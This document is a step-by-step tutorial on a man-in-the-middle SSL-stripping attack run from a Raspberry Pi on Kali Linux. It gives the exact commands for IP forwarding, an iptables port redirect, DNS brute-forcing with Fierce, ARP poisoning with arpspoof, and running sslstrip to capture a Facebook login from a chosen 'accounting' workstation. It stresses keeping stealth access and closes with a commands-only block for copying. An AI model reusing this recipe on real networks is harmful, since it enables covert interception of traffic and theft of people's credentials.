A successful attack on SSL encryption requires tools other than Wireshark. One such useful tool is SSLStrip. This program is designed to hijack the SSL session and replace the SSL encryption with plain text. This is done by monitoring all connection between the host system and the server. SSLStrip then replaces https:// request with http:// requests. The browser is faked into thinking it is still directly communicating directly with the server.
The above image shows a normal secure connection to a web server. Data is passed directly from the user and the host over secure channels. The user is relatively safe and secure.
In this scenario the data is intercepted by using a MitM attack and the secure requests to the server are replaced with unsecured requests. Data that is then transmitted can be viewed in plain text.
The best way to learn a new program is to execute the help command. The help command for SSLStrip follows the below syntax:
root@kali:~# sslstrip -h
SSLStrip Attack Process
The following sections cover each part of the attack. These are covered in chronological order as you read though this page. Use the following navigation to skip to specific sections, jump to the video tutorial, or review the commands only section.
- Setup IP forwarding
- Configure IP routing to redirect output from port 80 to port 8080
- Discover the network gateway IP
- Locate the target IP address
- Insert the Raspberry Pi as a MitM with ARPSpoof
- Recover Log-In Credentials Using SSLStrip
IP forwarding tells the Linux system to send packets to their proper destination. This is needed before we attempt to issue ARP Cache Poising. This will ensure that packets will get sent to their proper destination after we have inserted ourselves as a MitM. In essence, after we grab the network packets from the target system we have to pass them to their destination or we just create a denial of service (DoS).
Step 1: Setup IP forwarding
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Check to see ensure the command was executed correctly
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
Step 2: Redirect all packets going out on port 80 to port 8080. This will route the outgoing connections from SSLStrip to port 8080.
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Find Default Gateway
Step 3: Discover your current default gateway
root@kali:~# netstat -nr
Locate Target IP
There are several ways to discover the IP address of your target system. Network enumeration, DNS enumeration, Active Directory fingerprinting, and Social Engineering to name a few. Since the Raspberry Pi is already located on the host network we have the advantage of running several commands that can provide useful information. One option could be a full scan of the entire network. Albeit a informative option, this may give away our Raspberry Pi and we want to maintain stealth access.
Another option is a full scan of the target networks DNS servers to see if they allow zone transfers. However, over the years several security measures have been put added to protect networks from such DNS attacks. That said, by design a DNS server will always give you what you ask for if it knows the answer. This is an inherent weakness; the trick is to know what to ask. To get around this a brute force method is suggested.
Fierce is a program that will query a list of fully qualified domain names to a target DNS server within a specified domain. The goal is to find out what names are valid and return a target IP address. Fierce has a database of 2,280 common names that are automatically tried by default. The following domain names have been added to my ISP’s DNS, let’s find out how many are caught by the default setting of Fierce.
Step 4: Locate target IP address
root@kali:~# fierce -dns bahansen.info
Fierce found three of the six above entries, plus several default entries created by my host provider for essential services.
In my opinion the most enticing entry listed above would be accounting.bahansen.info that resolves to 192.168.2.87. Thus, we are going to move forward with our attack on the Accounting workstation. Now having the target system and default gateway we can now execute our attack.
MitM with ARPSpoof
ARPSpoof will issue a repeat command to tell the local network that the Raspberry Pi is now the Accounting system. The network will then send those packets to Kali Linux for us to intercept, the IP forwarding command in Step 1 will then pass those packet back and forth from the Accounting system to their destination.
The syntax for ARPSpoof follows:
arpspoof -i interface -t target IP -r gateway IP
Step 5: Issue the ARP cache poisoning command using ARPSpoof
root@kali:~# arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
This command will occupy the current command window. Be sure to leave ARPSpoof running and open a new connection to the Raspberry Pi to issue the final command.
SSLStrip is an easy command line program that will attempt to replace secure encrypted webpages with their plain-text equivalent.
Step 6:Open a new ssh session
root@kali:~# ssh 192.168.11.15
Step 7: Start SSLStrip to monitor for data being sent out on port 8080
root@kali:~# sslstrip -l 8080
On the target computer open a browser and connect to www.facebook.com and log-in with your account.
Step 8: Stop SSLStrip
Ctrl + C
Step 8: Review the captured data
root@kali:~# more sslstrip.log
The “%40 is URL encoding for an “@”, and “%21” is URL encoding for the “!”, after decoding you get:
User Name: firstname.lastname@example.org
echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 netstat -nr fierce -dns bahansen.info arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1 sslstrip -l 8080 more sslstrip.log